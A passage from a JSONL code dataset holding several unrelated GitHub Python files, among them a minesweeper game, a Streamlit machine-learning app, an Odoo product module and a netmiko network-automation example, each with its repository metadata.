[[BoardSpace() for i in range(cols)] for j in range(rows)]\n count = 0\n while count < m_count:\n row = random.randint(0, rows - 1)\n col = random.randint(0, cols - 1)\n if self.board[row][col].status == -1:\n continue\n else:\n self.addMine(row, col)\n count += 1\n\n def __str__(self):\n # print row by row\n # first col is empty and always exists\n result = ''\n result += ' |'\n for r in range(self.rows + 1):\n if r > 0:\n result += ' ' + str(r-1) + ' |'\n for i in range(self.cols):\n # r is row\n # i is col\n if self.board[r-1][i].revealed:\n result += ' ' + str(self.board[r - 1][i].status) + ' |'\n else:\n result += ' |'\n else: \n for i in range(self.cols):\n result += ' ' + str(i) + ' |'\n result += '\\n'\n for i in range(self.cols + 1):\n result += '----'\n result += '\\n'\n return result\n\n def addMine(self, r, c):\n self.board[r][c].status = -1\n for row in range(r-1, r+2):\n for col in range(c-1, c+2):\n if row >= 0 and row < self.rows and col >= 0 and col < self.cols and self.board[row][col].status != -1:\n self.board[row][col].status += 1\n \n def chooseSpace(self, r, c):\n # hit mine\n if self.board[r][c].status == -1:\n for row in range(self.rows):\n for col in range(self.cols):\n self.board[row][col].revealed = True\n self.gameOver = True\n self.gameWon = False\n return\n self.board[r][c].revealed = True\n self.revealedCount += 1\n if self.rows * self.cols - self.revealedCount == self.mines:\n self.gameOver = True\n self.gameWon = True\n # if zero space go out\n if self.board[r][c].status == 0:\n for row in range(r-1, r+2):\n for col in range(c-1, c+2):\n if row >= 0 and row < self.rows and col >= 0 and col < self.cols and self.board[row][col].revealed == False:\n self.chooseSpace(row, col)\n\n# esentailly main function\ndef playGame():\n # get board size\n rowCount = 1\n colCount = 1\n try:\n rowCount = int(input('Please enter number of rows: '))\n if rowCount <= 0:\n rowCount = int(input('Please enter number of rows: '))\n colCount = int(input('Please enter number of columns: '))\n if colCount <= 0:\n colCount = int(input('Please enter number of columns: '))\n mineCount = int(input('Please enter number of mines: '))\n if mineCount <= 0 or mineCount >= rowCount * colCount:\n mineCount = int(input('Please enter number of mines: '))\n except:\n print('Error reading input')\n return\n # initiate game state\n board = Board(rowCount, colCount, mineCount)\n print(board)\n while board.gameOver == False:\n r = -1\n if r < 0 or r >= rowCount:\n r = int(input('Pick a row: '))\n c = -1\n if c < 0 or c >= colCount:\n c = int(input('Pick a column: '))\n board.chooseSpace(r, c)\n if board.gameOver:\n break\n print(board)\n print('\\n')\n \n print(board)\n if board.gameWon:\n print('Congratulations! You have won.')\n else:\n print('KABOOM. Good luck next time.')\n try:\n playAgain = int(input('Enter 1 to play again: '))\n if playAgain == 1:\n playGame()\n except:\n return\n\n\nplayGame()","repo_name":"bevvvvv/ExploringData","sub_path":"TriplebytePractice/minesweeperSepich.py","file_name":"minesweeperSepich.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37943548342","text":"from scipy import rand\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import classification_report\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn import model_selection\r\nfrom sklearn import linear_model\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, max_error, r2_score \r\n\r\ndef reg(**kwargs):\r\n return linear_model.LinearRegression()\r\ndef tree(**kwargs):\r\n return DecisionTreeRegressor(max_depth=kwargs['depth'], min_samples_split=kwargs['split'], min_samples_leaf=kwargs['leafs'], random_state=kwargs['random'])\r\ndef forest(**kwargs):\r\n return RandomForestRegressor(n_estimators=kwargs['estimators'], max_depth=kwargs['depth'], min_samples_split=kwargs['split'], min_samples_leaf=kwargs['leafs'], random_state=kwargs['random'])\r\n\r\ndef log(**kwargs):\r\n return linear_model.LogisticRegression()\r\ndef treec(**kwargs):\r\n return DecisionTreeClassifier()\r\ndef forec(**kwargs):\r\n return RandomForestClassifier()\r\n\r\ndef pronostico():\r\n st.title(\"Predicción.\")\r\n st.sidebar.subheader('Información de sección.')\r\n st.sidebar.write('El proceso de predicción consta de utilizar los datos para que el alguritmo entrene y posteriormente'+\r\n ' sea capaz de extrapolar datos. De estos algoritmos tenemos regresión lineal, arboles y bosques de los cuales solo'+\r\n ' regresion lineal no necesita ningún parametro a ser establecido')\r\n st.sidebar.write('Debido a lo anterior, cuando se calcula arboles o bosque es necesario dar click en el boton \"continuar\" para '+\r\n 'que se desplieguen las opciones necesarias y posteriormente predecir, en el caso de la regresion se puede predecir directamente.')\r\n st.sidebar.write('De no poder hacer una predicción, revisa los datos y retira las variables categóricas.')\r\n st.session_state.aux= 'aux'\r\n model_dict={'Regresión lineal':reg,'Arboles':tree,'Bosque':forest}\r\n data=st.session_state.data[st.session_state.sp]\r\n est=''\r\n d=''\r\n split=''\r\n leafs=''\r\n with st.container():\r\n with st.form('Modelo de predicción.'):\r\n predict_type=st.radio('Modelo de predicción.',['Regresión lineal','Arboles','Bosque'])\r\n sb=st.form_submit_button('Continuar')\r\n with st.form('Opciones de predicción.'):\r\n dependant_var=st.selectbox('Seleccionar variable a ser predicha.',data.columns)\r\n st.dataframe(data[dependant_var])\r\n if predict_type=='Arboles':\r\n d=st.number_input('Profundidad maxima',2)\r\n split=st.number_input('Cantidad mínima para hacer split',2)\r\n leafs=st.number_input('Cantidad minima de hojas',1)\r\n elif predict_type=='Bosque':\r\n est=st.number_input('Número de estimadores',1)\r\n d=st.number_input('Profundidad maxima',2)\r\n split=st.number_input('Cantidad mínima para hacer split',2)\r\n leafs=st.number_input('Cantidad minima de hojas',1)\r\n sb=st.form_submit_button('Predecir')\r\n try:\r\n if sb:\r\n independant_var=data.columns.drop(dependant_var)\r\n X= np.array(data[independant_var])\r\n Y= np.array(data[dependant_var])\r\n x_train,x_test,y_train,y_test= model_selection.train_test_split(X,Y,test_size=0.2,random_state=1234,shuffle=True)\r\n prediccion=model_dict[predict_type](estimators=est,depth=d,split=split,leafs=leafs,random=1234)\r\n prediccion.fit(x_train,y_train)\r\n Yp=prediccion.predict(x_test)\r\n plt.plot(y_test,color='green',marker='o',label='Datos de prueba')\r\n plt.plot(Yp,color='red',marker='o',label='Datos de calculados')\r\n fig=plt.plot()\r\n st.pyplot(fig)\r\n if predict_type=='Regresión lineal':\r\n st.write('Coeficientes: '+str(prediccion.coef_))\r\n st.write('Intercepto: '+str(prediccion.intercept_))\r\n st.write('Residuo: '+str(max_error(y_test,Yp)))\r\n st.write('MSE: '+str(mean_squared_error(y_test,Yp)))\r\n st.write('RMSE: '+str(mean_squared_error(y_test,Yp,squared=False)))\r\n st.write('Score: '+str(r2_score(y_test,Yp)))\r\n else:\r\n st.write('Criterio: '+str(prediccion.criterion))\r\n st.dataframe(pd.DataFrame({'Variable':list(data[independant_var]),'Peso':prediccion.feature_importances_}).sort_values('Peso',ascending=False))\r\n st.write('MAE: '+str(mean_absolute_error(y_test,Yp)))\r\n st.write('MSE: '+str(mean_squared_error(y_test,Yp)))\r\n st.write('RMSE: '+str(mean_squared_error(y_test,Yp,squared=False)))\r\n st.write('Score: '+str(r2_score(y_test,Yp)))\r\n except:\r\n st.subheader('Existe una variable que impide el proceso de predicción. Revisa los datos.')\r\n \r\n \r\n\r\n\r\ndef clasificacion():\r\n st.title(\"Clasificación.\")\r\n st.sidebar.subheader('Información de sección.')\r\n st.sidebar.write('El proceso de clasificación es muy similar al de predicción pero hay unos puntos importantes a tomar en cuenta.')\r\n st.sidebar.write('La clasificación por arboles y bosque es posible realizarla por variables categóricas pero la de regresión logística no'+\r\n ' es necesario tener valores binarios en la variable que se va a clasificar.')\r\n st.session_state.aux= 'aux'\r\n model_dict={'Regresión logística':log,'Arboles':treec,'Bosque':forec}\r\n data=st.session_state.data[st.session_state.sp]\r\n est=''\r\n d=''\r\n split=''\r\n leafs=''\r\n with st.container():\r\n with st.form('Modelo de predicción.'):\r\n predict_type=st.radio('Modelo de predicción',['Regresión logística','Arboles','Bosque'])\r\n sb=st.form_submit_button('Continuar')\r\n with st.form('Opciones de predicción.'):\r\n dependant_var=st.selectbox('Seleccionar variable a ser predicha.',data.columns)\r\n st.dataframe(data[dependant_var])\r\n if predict_type=='Arboles':\r\n d=st.number_input('Profundidad maxima',2)\r\n split=st.number_input('Cantidad mínima para hacer split',2)\r\n leafs=st.number_input('Cantidad minima de hojas',1)\r\n elif predict_type=='Bosque':\r\n est=st.number_input('Número de estimadores',1)\r\n d=st.number_input('Profundidad maxima',2)\r\n split=st.number_input('Cantidad mínima para hacer split',2)\r\n leafs=st.number_input('Cantidad minima de hojas',1)\r\n sb=st.form_submit_button('Clasificar')\r\n if sb:\r\n independant_var=data.columns.drop(dependant_var)\r\n X= np.array(data[independant_var])\r\n Y= np.array(data[dependant_var])\r\n x_train,x_validation,y_train,y_validation= model_selection.train_test_split(X,Y,test_size=0.2,random_state=1234,shuffle=True)\r\n clasificador=model_dict[predict_type](estimators=est,depth=d,split=split,leafs=leafs,random=1234)\r\n clasificador.fit(x_train,y_train)\r\n Yp=clasificador.predict(x_validation)\r\n st.text('Matriz de confusión: ')\r\n st.dataframe(pd.crosstab(y_validation.ravel(),Yp,rownames=['Real'],colnames=['Clasificación']))\r\n if predict_type=='Regresión logística':\r\n st.write('Exactitud: '+str(clasificador.score(x_validation,y_validation)))\r\n st.write('Información general:')\r\n st.dataframe(pd.DataFrame(classification_report(y_validation,Yp,output_dict=True)).transpose())\r\n st.write('Intercepción: '+str(clasificador.intercept_))\r\n st.write('Coeficientes: '+str(clasificador.coef_))\r\n else:\r\n st.write('Criterio: '+str(clasificador.criterion))\r\n st.write('Exactitud: '+str(clasificador.score(x_validation,y_validation)))\r\n st.write('Información general:')\r\n st.dataframe(pd.DataFrame(classification_report(y_validation,Yp,output_dict=True)).transpose())\r\n st.dataframe(pd.DataFrame({'Variable':list(data[independant_var]),'Peso':clasificador.feature_importances_}).sort_values('Peso',ascending=False))","repo_name":"GombVF/Mineria","sub_path":"procla.py","file_name":"procla.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71071578028","text":"# We'll use the `requests` module to make our HTTP Request \nimport requests\n\n# We'll use the `json` module to format our response's data\nimport json\n\n# First, we define our base URL and our parameters\n# Our parameters can be a Dictionary, since the `requests` module converts them\nendpoint = 'https://en.wikipedia.org/w/api.php'\nparameters = {\n 'format': 'json',\n 'action': 'query',\n 'redirects': 1,\n 'prop': 'extracts',\n 'exintro': 1,\n 'explaintext': 1,\n 'titles': 'tjhsst'\n}\n\n# Now, we're able to fire the configured HTTP GET request\nresponse = requests.get(endpoint, params=parameters)\n\n# Next, we convert the response to a JSON with `json.loads()`\npages = json.loads(response.text)['query']['pages']\n\n# Finally, we pick out the data we want and print it to the console\n# Use Postman to figure out what format your data is in and access it accordingly\nfor key in pages.keys():\n print('Full Title: ' + pages[key]['title'])\n print('')\n introduction = pages[key]['extract'].replace('\\n', ' ')\n print('Introduction: ' + introduction)\n print('')\n ","repo_name":"QuorumUS/hacktj-examples","sub_path":"python/wikipedia_get_request.py","file_name":"wikipedia_get_request.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3716034232","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# Question 2 (10’)\n# \n# Given a binary tree, find the max depth of it. Modify the “solution” function in the question2.py\n# (Analyze your time complexity, and only time-complexity optimized solution gets full grade)\n\n# In[40]:\n\n\n# Bartley Cai\nclass TreeNode(object):\n \"\"\" Definition of a binary tree node.\"\"\"\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\ndef solution(root):\n# this checks the depth of a tree from the specified node\n# any parent nodes are not considered\n# therefore, to obtain max depth, the \"ancestor\" node must be known\n if root is None: \n return 0\n else:\n # check each subtree depth\n # recursion\n right_depth = solution(root.right)\n left_depth = solution(root.left)\n # recursion indicates O(n) complexity\n if right_depth > left_depth:\n return right_depth+1\n else:\n return left_depth+1\n\n #return depth\n\na15=TreeNode(15)\na7=TreeNode(7)\na20=TreeNode(20)\na9=TreeNode(9)\na3=TreeNode(3)\na20.left=a15\na20.right=a7\na3.left=a9\na3.right=a20\nprint(solution(a3))\n\n","repo_name":"6900HS/AuE8930","sub_path":"Homework 3/Question 2.py","file_name":"Question 2.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10209223316","text":"df = pd.read_table('RSV-Virus-Normalized')\nL = []\nS = []\nfor i in range(0,16,2):\n L.append(df.Normalized[i] + df.Normalized[i+1])\n sn = df.Sample[i].split('-')[0]\n if sn == 'HRSV0h':\n S.append('Mock')\n else:\n S.append(sn[1:])\n \n \ndf = pd.DataFrame(L,index=S)\ndf.ix[:,0] = np.log2(df.ix[:,0])\ndf.ix[0,0]=0\n\nfig = plt.figure()\nax = fig.add_axes([0.1,0.15,0.85,0.8])\nax = df.plot(kind='bar', ax=ax, legend=False)\nax.set_xticklabels(S, rotation=45)\nax.set_ylabel('Normalized number of virus reads (log2)')\nplt.savefig('RSV-Virus-Normalized.pdf')\n","repo_name":"chw333/StanfordSGTC","sub_path":"NMDvirus/04-virus/RSV/06-VirusNumbr-barplot.py","file_name":"06-VirusNumbr-barplot.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19644438664","text":"from typing import List\nimport src.parser as parsers\nfrom src.syntax.conditions import Condition\nfrom src.syntax import Scope\n\n\nclass IfCondition(Scope):\n def __init__(self, condition_tokens: List[str], body_tokens: List[str], super_scope: Scope=None):\n super().__init__()\n self.parent = super_scope\n self.__condition_tokens = condition_tokens\n self.__body_tokens = body_tokens\n # Trims trailing whitespace\n if self.__body_tokens[len(self.__body_tokens) - 1] == \"\\n\":\n del self.__body_tokens[len(self.__body_tokens) - 1]\n self.condition = Condition(self.__condition_tokens, self.parent)\n self.__parse()\n\n def __parse(self):\n newlines = self.__find_newlines(0, len(self.__body_tokens))\n parser = parsers.Parser(self.__body_tokens)\n for i, newline in enumerate(newlines):\n token = self.__body_tokens[newline + 1]\n # Parse if and else bodies separately if there's an else present\n if token == \"else\":\n main_body = self.__body_tokens[0:newlines[i]]\n main_parser = parsers.Parser(main_body, scope=self)\n sub = self.__body_tokens[newlines[i + 1]: len(self.__body_tokens)]\n sub_parser = parsers.Parser(sub, scope=self)\n self.main_commands = main_parser.parse()\n self.else_commands = sub_parser.parse()\n return\n\n # If there's no else, parse the entire body as one\n self.main_commands = parser.parse()\n return\n\n # Finds all newlines in the token array\n def __find_newlines(self, start, end):\n # Adds the beginning index to the array so parsing starts at the beginning\n # token instead of the first newline\n newlines = [start - 1] + [i for i, j in enumerate(self.__body_tokens) if j == \"\\n\"]\n newlines = [i for i in newlines if (start - 1) <= i < end]\n return newlines\n\n def toPython(self):\n tab = \" \"\n newline = f\"\\n{tab*self.parentCount()}\"\n else_newline = f\"\\n{tab*(self.parentCount()-1)}\"\n string = f\"\"\"if {self.condition.toPython()}:{newline}{newline.join([command.toPython() for command in self.main_commands])}\"\"\"\n if self.else_commands is not None:\n elseString = f\"\"\"{else_newline}else:{newline}{newline.join([command.toPython() for command in self.else_commands])}\"\"\"\n string += elseString\n return string\n","repo_name":"Sherif-Abdou/ezpy","sub_path":"src/syntax/conditions/if_condition.py","file_name":"if_condition.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4795713989","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n\nimport emotionPredictor as ep\nimport tkinter as Tkinter\n\nclass simpleapp_tk(Tkinter.Tk):\n def __init__(self,parent):\n Tkinter.Tk.__init__(self,parent)\n self.parent = parent\n self.initialize()\n\n def initialize(self):\n self.grid()\n\n self.entryVariable = Tkinter.StringVar()\n self.entry = Tkinter.Entry(self,textvariable=self.entryVariable)\n self.entry.grid(column=0,row=0,sticky='EW')\n self.entry.bind(\"\", self.OnPressEnter)\n self.entryVariable.set(u\"Enter text here.\")\n\n button = Tkinter.Button(self,text=u\"Click me !\",\n command=self.OnButtonClick)\n button.grid(column=1,row=0)\n\n self.labelVariable = Tkinter.StringVar()\n\n self.label = Tkinter.Label(self,textvariable=self.labelVariable,\n anchor=\"w\",fg=\"white\",bg=\"blue\")\n\n self.label.grid(column=0,row=1,columnspan=2,sticky='EW')\n\n self.labelVariable.set(u\"Hello !\")\n\n self.grid_columnconfigure(0,weight=1)\n self.resizable(True,False)\n self.update()\n self.geometry(self.geometry()) \n self.entry.focus_set()\n self.entry.selection_range(0, Tkinter.END)\n\n def OnButtonClick(self):\n\n self.labelVariable.set( self.evaluate())\n self.entry.focus_set()\n self.entry.selection_range(0, Tkinter.END)\n\n def OnPressEnter(self,event):\n\n self.labelVariable.set( self.evaluate() )\n self.entry.focus_set()\n self.entry.selection_range(0, Tkinter.END)\n\n def evaluate(self):\n inputText = self.entryVariable.get()\n outputText = ep.emotionPredictor(inputText)\n if outputText==\"neg\":\n finalText = \"Negative :(\"\n self.label.configure(bg=\"red\")\n else:\n finalText = \"Positive :)\"\n self.label.configure(bg=\"blue\")\n return finalText\n\nif __name__ == \"__main__\":\n app = simpleapp_tk(None)\n app.title('Emotion Detector')\n app.mainloop()","repo_name":"papaniivanderpuye/Public-Projects","sub_path":"Emotion Predictor Project (Machine Learning, Python)/guiForProject.py","file_name":"guiForProject.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21222624006","text":"import itertools\nimport logging\nimport base64\n\nfrom odoo import api, fields, models, tools, _, SUPERUSER_ID\nfrom odoo.exceptions import ValidationError, RedirectWarning, UserError\n\n_logger = logging.getLogger(__name__)\n\n\nclass ProductTemplate(models.Model):\n _inherit = \"product.template\"\n\n\n mrp_product_qty = fields.Float('Manufactured',digits='New Cortex Precision',\n compute='_compute_mrp_product_qty', compute_sudo=False)\n drawing_no = fields.Char('Drawing #', track_visibility='onchange')\n default_code = fields.Char(\n 'Part Number', compute='_compute_default_code',\n inverse='_set_default_code', store=True)\n drawing_version = fields.Selection([('a', 'A'), ('b', 'B'), ('c', 'C'), ('d', 'D'), ('e', 'E'), ('f', 'F'), ('g', 'G'), ('h', 'H')], string='Drawing Version')\n drawing_pdf = fields.Binary(string='Drawing pdf')\n file_name = fields.Char(string='FileName')\n sales_count = fields.Float(compute='_compute_sales_count', string='Sold', digits='New Cortex Precision')\n purchased_product_qty = fields.Float(compute='_compute_purchased_product_qty', string='Purchased',digits='New Cortex Precision')\n length = fields.Float(string=\"Length\",compute='_compute_length', inverse='_set_length',store=True)\n running_avg_cost = fields.Float(string=\"Running AVG. cost\",compute='_compute_running_avg_cost',digits='New Cortex Precision')\n machine_parts_count = fields.Integer(string='Machine Part', compute='_compute_installed_parts_ids')\n installed_parts_count = fields.Integer(string='Installed Part', compute='_compute_installed_parts_ids')\n vendor_product_code_store = fields.Char(string=\"Store Vendor Code\",compute=\"compute_store_vendor_code\",store=True)\n drawing_number = fields.Char(string='Drawing #', compute='_compute_drawing_number', store=True)\n service_products = fields.Many2many('product.product', string='Service Products')\n cornomics_detail_ids = fields.One2many('cornomics.company.detail', 'product_tmpl_id',\n string='Cornomics Detail Line')\n active = fields.Boolean('Active', default=True, tracking=True,\n help=\"If unchecked, it will allow you to hide the product without removing it.\")\n installed_quantity = fields.Float(string=\"Installed Quantity\",compute=\"_compute_installed_parts_ids\",digits='New Cortex Precision' )\n minimum_stock = fields.Integer('Minimum Stock',default=50)\n unit_or_per = fields.Selection([('per','%'),('unit','Unit')],default='per')\n product_with_vendor_ids = fields.One2many('product.with.vendor','product_template_id', string=\"Manufacturing Order\") \n list_of_attachment = fields.One2many('drawing.files','template_id',string=\"List of Attachment\")\n\n @api.onchange('drawing_no', 'drawing_version')\n def onchange_drawing_no(self):\n # If the drawing no is not exist then no need for drawing version so removed value of it\n if not self.drawing_no and self.drawing_version:\n self.drawing_version = ''\n\n @api.depends('drawing_no', 'drawing_version')\n def _compute_drawing_number(self):\n for record in self:\n drawing_number = record.drawing_no\n if record.drawing_version and drawing_number:\n drawing_number = drawing_number + ' - ' + (record.drawing_version).upper()\n record.drawing_number = drawing_number\n\n @api.depends('seller_ids.product_code')\n def compute_store_vendor_code(self):\n for record in self:\n total_product_code =''\n for line in record.seller_ids:\n if line.product_code:\n if total_product_code:\n total_product_code += ',' + line.product_code\n else:\n total_product_code = line.product_code\n record.vendor_product_code_store = total_product_code\n\n @api.depends('product_variant_id')\n def _compute_installed_parts_ids(self):\n for product in self:\n machine_parts = self.env['installed.part'].search([('installed_part_detail_id.product_id', 'in', product.product_variant_id.ids)])\n installed_parts = self.env['installed.part.detail'].search(\n [('product_id', 'in', product.product_variant_id.ids)])\n\n total=0\n for record in installed_parts:\n total += record.installed_knife\n\n product.installed_quantity = total\n product.machine_parts_count = len(machine_parts)\n product.installed_parts_count = len(installed_parts)\n\n\n def action_view_machine_parts(self):\n return {\n 'name': _('Machine Center'),\n 'res_model': 'installed.part',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'list,form',\n 'domain': [('installed_part_detail_id.product_id', 'in', self.product_variant_id.ids)],\n 'context': {'default_partner_id':self.id}\n }\n\n def action_view_installed_parts(self):\n return {\n 'name': _('Installed Part'),\n 'res_model': 'installed.part.detail',\n 'type': 'ir.actions.act_window',\n 'view_mode': 'list,form',\n 'domain': [('product_id', 'in', self.product_variant_id.ids)],\n 'context': {'search_default_filter_frequency': 1}\n }\n\n def _compute_running_avg_cost(self):\n stock_valuation = self.env['stock.valuation.layer']\n fields = ['product_id', 'quantity', 'value']\n groupby = ['product_id']\n for records in self:\n domain = [('product_id.product_tmpl_id','=',records.id)]\n inventory_value = stock_valuation.read_group(domain, fields, groupby)\n if inventory_value:\n if inventory_value[0].get('quantity') > 0:\n records.running_avg_cost = inventory_value[0].get('value') / inventory_value[0].get('quantity')\n else:\n records.running_avg_cost = 0.0\n else:\n records.running_avg_cost = 0.0\n\n @api.depends('product_variant_ids', 'product_variant_ids.length')\n def _compute_length(self):\n unique_variants = self.filtered(lambda template: len(template.product_variant_ids) == 1)\n for template in unique_variants:\n template.length = template.product_variant_ids.length\n for template in (self - unique_variants):\n template.length = 0.0\n\n def _set_length(self):\n for template in self:\n if len(template.product_variant_ids) == 1:\n template.product_variant_ids.length = template.length\n\n # Send mail when installed part stock gone below half of minimum stock\n def cron_alert_installed_part(self):\n product_data = self.search_read([], ['default_code', 'name', 'installed_quantity', 'qty_available','minimum_stock','unit_or_per','product_variant_id'])\n IrConfigParameter = self.env['ir.config_parameter'].sudo().get_param('cortex_na.product_related_hq_location', 'False')\n location = int(IrConfigParameter)\n fields = ['product_id', 'quantity']\n groupby = ['product_id']\n domain = [('location_id','=',location),('quantity','>',0)]\n inventory_value = self.env['stock.quant'].read_group(domain, fields, groupby)\n product_dict = {}\n for obj in inventory_value:\n product_dict.update({obj.get('product_id')[0]:obj.get('quantity')})\n\n product_list = []\n for record in product_data:\n installed_quantity = record.get('installed_quantity')\n mnimum_stock = record.get('minimum_stock')\n unit_or_per = record.get('unit_or_per')\n if unit_or_per == 'per':\n ratio = (installed_quantity * mnimum_stock) / 100\n else:\n ratio = mnimum_stock\n\n on_hand = record.get('qty_available') or 0\n if on_hand < ratio:\n record['hq'] = product_dict.get(record.get('product_variant_id')[0]) or 0\n record['other_location'] = record.get('qty_available') - record.get('hq')\n product_list.append(record)\n \n\n\n template_id = self.env.ref('cortex_na.email_template_alert_installed_part')\n user_ids = self.env.user\n if product_list:\n attachmnet_id = self.action_generate_attachment(product_list)\n if attachmnet_id:\n template_id.attachment_ids = [(6, 0, attachmnet_id.ids)]\n msg = \"Please find an attachment for parts which is below the minimum stock level.\"\n else:\n template_id.attachment_ids = None\n msg = \"No any Parts which is below the minimum stock level.\"\n else:\n template_id.attachment_ids = None\n msg = \"No any Parts which is below the minimum stock level.\"\n template_id.with_context(msg=msg).send_mail(user_ids.id, force_send=True)\n _logger.info(\"Successfully send mail for Installed Part Stock Report.\")\n\n def action_generate_attachment(self, product_list):\n \"\"\" this method called from button action in view xml \"\"\"\n # generate pdf from report, use report's id as reference\n pdf = self.env.ref('cortex_na.alert_installed_part_report').with_context(data=product_list).render_qweb_pdf()\n # pdf result is a list\n b64_pdf = base64.b64encode(pdf[0])\n # save pdf as attachment\n attachment_name = \"Installed Part Stock Report\"\n if b64_pdf:\n return self.env['ir.attachment'].create({\n 'name': attachment_name,\n 'type': 'binary',\n 'datas': b64_pdf,\n 'res_model': self._name,\n 'res_id': self.id,\n 'mimetype': 'application/pdf'\n })\n else:\n return False\n\n def duplicate_with_bom(self):\n self.ensure_one()\n new_product = self.copy()\n\n current_attributes_vals = {}\n for tmpl_attr in self.valid_product_template_attribute_line_ids._without_no_variant_attributes().product_template_value_ids._only_active():\n current_attributes_vals[tmpl_attr.id] = (tmpl_attr.attribute_id.id, tmpl_attr.name)\n new_attributes_vals_r = {}\n for tmpl_attr in new_product.valid_product_template_attribute_line_ids._without_no_variant_attributes().product_template_value_ids._only_active():\n new_attributes_vals_r[(tmpl_attr.attribute_id.id, tmpl_attr.name)] = tmpl_attr.id\n\n new_variants_attrs_r = {}\n for product in new_product.product_variant_ids:\n new_variants_attrs_r[tuple(product.product_template_attribute_value_ids.ids)] = product.id\n\n existing_bom = self.env['mrp.bom'].search([('product_tmpl_id', '=', self.id)])\n if existing_bom:\n for e_bom in existing_bom:\n new_bom_data = {\n 'product_tmpl_id': new_product.id\n }\n new_bom_p_id = None\n if e_bom.product_id:\n e_product_attrs_ids = e_bom.product_id.product_template_attribute_value_ids.ids\n if e_product_attrs_ids:\n n_product_attrs_ids = []\n for attr_id in e_product_attrs_ids:\n attr_val = current_attributes_vals[attr_id]\n if new_attributes_vals_r.get(attr_val):\n n_product_attrs_ids.append(new_attributes_vals_r[attr_val])\n if new_variants_attrs_r.get(tuple(n_product_attrs_ids)):\n new_bom_p_id = new_variants_attrs_r[tuple(n_product_attrs_ids)]\n else:\n new_bom_p_id = new_product.product_variant_id.id\n if new_bom_p_id:\n new_bom_data['product_id'] = new_bom_p_id\n\n bom_vals = e_bom.with_context(active_test=False).copy_data(new_bom_data)[0]\n for bom_line in bom_vals.get('bom_line_ids') or []:\n if len(bom_line) == 3:\n line_data = bom_line[2]\n if line_data.get('bom_product_template_attribute_value_ids'):\n line_attr = line_data['bom_product_template_attribute_value_ids']\n if len(line_attr[0]) == 3 and line_attr[0][2]:\n new_attr_ids = []\n for line_attr_id in line_attr[0][2]:\n line_attr_val = current_attributes_vals[line_attr_id]\n if new_attributes_vals_r.get(line_attr_val):\n new_attr_ids.append(new_attributes_vals_r[line_attr_val])\n line_attr_list_data = list(line_attr[0])\n line_attr_list_data[2] = new_attr_ids\n line_attr[0] = tuple(line_attr_list_data)\n e_bom.copy(bom_vals)\n if new_product:\n action = {\n 'type': 'ir.actions.act_window',\n 'res_model': self._name,\n 'view_type': 'form',\n 'view_mode': 'form',\n 'target': 'current',\n 'res_id': new_product.id,\n 'context': dict(self._context),\n }\n else:\n raise UserError(_('Something went wrong.'))\n return action\n\n\nclass ProductWithVendor(models.Model):\n _name = \"product.with.vendor\"\n \n product_template_id = fields.Many2one('product.template', string=\"Product\")\n bom_id = fields.Many2one('mrp.bom',string='Bill of Material', domain = \"[('product_tmpl_id','=',parent.id),('type', '=', 'normal')]\", required=\"True\")\n partner_id = fields.Many2one('res.partner',string='Vendor', required=\"True\")\n company_id = fields.Many2one(\n 'res.company', 'Company', default=lambda self: self.env.company, index=True, required=True)\n","repo_name":"Cortex4103/Cortex2","sub_path":"cortex_na/models/product_template.py","file_name":"product_template.py","file_ext":"py","file_size_in_byte":14053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40946616077","text":"import time\nimport logging\nfrom concurrent.futures import ThreadPoolExecutor\nfrom itertools import repeat\n\nfrom netmiko import ConnectHandler\nfrom netmiko.ssh_exception import SSHException\n\n# Logging configuration\nlog = logging.getLogger(__name__)\nlog.addHandler(logging.NullHandler())\n\n\ndef send_show(device_dict, command):\n ip = device_dict[\"host\"]\n log.info(f\"===> Connection: {ip}\")\n\n try:\n with ConnectHandler(**device_dict) as ssh:\n ssh.enable()\n result = ssh.send_command(command)\n log.debug(f\"<=== Received: {ip}\")\n log.debug(f\"Получен вывод команды {command}\\n\\n{result}\")\n return result\n except SSHException as error:\n #log.exception(f\"Ошибка {error} на {ip}\")\n log.error(f\"Ошибка {error} на {ip}\")\n\n\ndef send_command_to_devices(devices, command):\n log.debug(\"START\")\n data = {}\n with ThreadPoolExecutor(max_workers=2) as executor:\n result = executor.map(send_show, devices, repeat(command))\n for device, output in zip(devices, result):\n data[device[\"host\"]] = output\n return data\n","repo_name":"natenka/advpyneng-examples-exercises","sub_path":"examples/05_logging/null_handler/base_functions.py","file_name":"base_functions.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"7943439071","text":"#!/usr/bin/env python3\n\n# -*- coding: utf-8 -*-\n\nimport os\nimport sys\nimport subprocess\n\n# Тест работы скрипта\nif __name__ == \"__main__\":\n # import nltk\n # 